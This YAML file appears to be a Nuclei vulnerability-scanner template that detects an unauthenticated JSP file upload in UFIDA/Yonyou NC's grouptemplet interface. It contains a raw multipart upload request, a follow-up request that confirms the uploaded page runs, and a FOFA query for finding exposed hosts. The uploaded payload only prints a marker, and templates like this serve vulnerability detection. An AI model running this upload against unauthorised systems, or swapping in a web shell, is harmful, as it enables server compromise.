45 lines
1.4 KiB
YAML
Executable File
45 lines
1.4 KiB
YAML
Executable File
id: yonyou-nc-grouptemplet-fileupload
|
|
|
|
info:
|
|
name: UFIDA NC Grouptemplet Interface - Unauthenticated File Upload
|
|
author: SleepingBag945
|
|
severity: critical
|
|
description: |
|
|
The UFIDA NC Grouptemplet Interface permits unauthenticated users to upload potentially malicious files.
|
|
reference:
|
|
- https://www.seebug.org/vuldb/ssvid-99547
|
|
- https://github.com/Augensternyu/POC-bomber/blob/main/pocs/redteam/yongyou_nc_fileupload_2022.py
|
|
metadata:
|
|
max-request: 2
|
|
fofa-query: app="用友-UFIDA-NC
|
|
verified: true
|
|
tags: yonyou,nc,intrusive
|
|
|
|
variables:
|
|
v1: "{{rand_int(1,100)}}"
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /uapim/upload/grouptemplet?groupid={{v1}}&fileType=jsp HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-type: multipart/form-data; boundary=----------Ef1KM7GI3Ef1ei4Ij5ae0KM7cH2KM7
|
|
|
|
------------Ef1KM7GI3Ef1ei4Ij5ae0KM7cH2KM7
|
|
Content-Disposition: form-data; name="upload"; filename="{{randstr_1}}.jsp"
|
|
Content-Type: application/octet-stream
|
|
|
|
<%out.println("{{randstr_2}}");%>
|
|
------------Ef1KM7GI3Ef1ei4Ij5ae0KM7cH2KM7--
|
|
|
|
- |
|
|
GET /uapim/static/pages/{{v1}}/head.jsp HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- "status_code_1 == 200"
|
|
- "status_code_2 == 200 && contains(body_2,'{{randstr_2}}')"
|
|
condition: and |